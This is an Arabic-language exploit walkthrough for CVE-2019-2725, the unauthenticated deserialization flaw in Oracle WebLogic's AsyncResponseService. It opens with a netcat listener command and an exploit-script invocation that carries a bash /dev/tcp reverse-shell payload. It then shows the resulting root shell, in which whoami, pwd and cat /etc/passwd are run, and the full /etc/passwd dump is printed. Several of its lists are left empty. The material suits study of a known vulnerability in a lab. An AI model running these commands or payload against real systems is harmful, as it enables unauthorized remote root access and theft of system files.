
استغلال تنفيذ التعليمات البرمجية عن بُعد غير المصادق عليه لخادم Oracle WebLogic (CVE-2019-2725) عبر إلغاء التسلسل في AsyncResponseService، مما يوفر قشرة عكسية من خلال طلبات SOAP المصممة.
ثغرة في مكون خادم Oracle WebLogic من Oracle Fusion Middleware (المكون الفرعي: خدمات الويب). الإصدارات المدعومة المتأثرة هي 10.3.6.0.0 و 12.1.3.0.0. ثغرة قابلة للاستغلال بسهولة تسمح لمهاجم غير مصادق مع وصول شبكي عبر HTTP باختراق خادم Oracle WebLogic.
CVE ID: CVE-2019-2725
Severity: حرجة (CVSS v3: 9.8)
Vulnerability Type: تنفيذ تعليمات برمجية عن بُعد بدون مصادقة (RCE)
Affected Product: Oracle WebLogic Server
Affected Component: AsyncResponseService
Authentication Required: لا
User Interaction Required: لا
CVE-2019-2725 هي ثغرة حرجة في إلغاء التسلسل (deserialization) في Oracle WebLogic Server تسمح للمهاجمين عن بُعد غير المصادقين بتنفيذ أوامر نظام تعسفية عبر طلب SOAP مصمم خصيصًا يُرسل إلى نقطة النهاية /_async/AsyncResponseService.
إصدارات Oracle WebLogic Server قبل التحديث النقدي لشهر أبريل 2019 (Critical Patch Update)، بما في ذلك على سبيل المثال لا الحصر:
توجد الثغرة بسبب إلغاء التسلسل غير الآمن في AsyncResponseService.
يمكن للمهاجم إرسال حمولة XML ضارة تؤدي إلى تنفيذ أوامر تعسفية على نظام التشغيل الأساسي بدون مصادقة.
هذه المشكلة خطيرة بشكل خاص لأن:
ابدأ مستمع Netcat لاستقبال الشل العكسي:
nc -lvp 2323
شغّل سكريبت الاستغلال ضد خادم WebLogic الضعيف:
python3 CVE-2019-2725.py http://172.17.0.6:7001/_async/AsyncResponseService '/bin/bash -i >& /dev/tcp/172.17.0.10/2323 0>&1'
المخرجات المتوقعة:
[+] Target appears VULNERABLE
[*] Sending payload...
[+] Payload delivered successfully (HTTP 202)
على مستمع Netcat، يتم استقبال شل عكسي:
Listening on 0.0.0.0 2323
Connection received on 172.17.0.6 39926
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain#
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain# whoami
root
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain#
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain# pwd
/root/Oracle/Middleware/user_projects/domains/base_domain
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain#
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain#
HTTP 202 Accepted المتكررة من الخدمات غير المتزامنة/bin/bash/bin/shتمت الإشارة إلى المستودعات العامة التالية لفهم والتحقق من الاستغلال: